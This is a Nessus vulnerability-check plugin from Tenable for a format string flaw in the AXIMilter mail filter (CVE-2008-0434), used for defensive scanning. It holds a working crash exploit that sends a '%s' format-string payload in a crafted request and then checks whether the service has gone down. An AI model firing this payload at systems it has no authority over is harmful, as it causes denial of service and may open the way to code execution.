#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30106);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2008-0434");
  script_bugtraq_id(27363);
  script_xref(name:"OSVDB", value:"40486");

  script_name(english:"AXIMilter Format String Vulnerability");
  script_summary(english:"Tries to crash AXIMilter");

  desc = "
Synopsis :

The remote mail service is affected by a format string vulnerability. 

Description :

The version of AXIMilter installed on the remote host fails to
sanitize input of format string identifiers.  Using a specially-
crafted packet, an unauthenticated remote attacker can crash the
service or possibly execute arbitrary code on the remote host subject
to the privileges under which the service operates. 

See also :

http://archives.neohapsis.com/archives/fulldisclosure/2008-01/0412.html
http://www.milw0rm.com/exploits/4947

Solution :

Either configure AXIMilter to listen only on the loopback interface,
which is its default behavior, or allow access only from trusted
hosts. 

Risk factor :

Medium / CVSS Base Score : 5.1
(CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("aximilter_detect.nasl");
  script_require_ports("Services/aximilter", 1981);

  exit(0);
}


port = get_kb_item("Services/aximilter");
if (!port) port = 1981;
if (!get_port_state(port)) exit(0);


crlf = '\r\n';
exploit = "%s%s%s%s%s%s%s%s%s";


# Make sure it's working.
soc = open_sock_tcp(port);
if (!soc) exit(0);

req = "PING" + crlf;
send(socket:soc, data:req);
res = recv_line(socket:soc, length:256);
close(soc);
if (strlen(res) == 0) exit(0);

res = chomp(res);
if ('PONG' == toupper(res))
{
  # Try to exploit the issue to crash the daemon.
  soc = open_sock_tcp(port);
  if (!soc) exit(0);

  req = string(
    "FROM: ", crlf,
    "EHLO: ", crlf,
    "CNIP: ", crlf,
    "CNPO: ", crlf,
    "CNHO: ", exploit, crlf,
    "RCPT: ", crlf,
    "VERI: ", crlf
  );
  send(socket:soc, data:req);
  res = recv_line(socket:soc, length:256);
  close(soc);

  # Try several times to re-connect.
  if (strlen(res) == 0)
  {
    tries = 5;
    for (iter=0; iter<tries; iter++)
    {
      # Check whether it's truly down.
      soc = open_sock_tcp(port);
      if (soc)
      {
        s = recv_line(socket:soc);
        close(soc);
        sleep(1);
      }
      else
      {
        security_warning(port); 
        exit(0);
      }
    }
  }
}
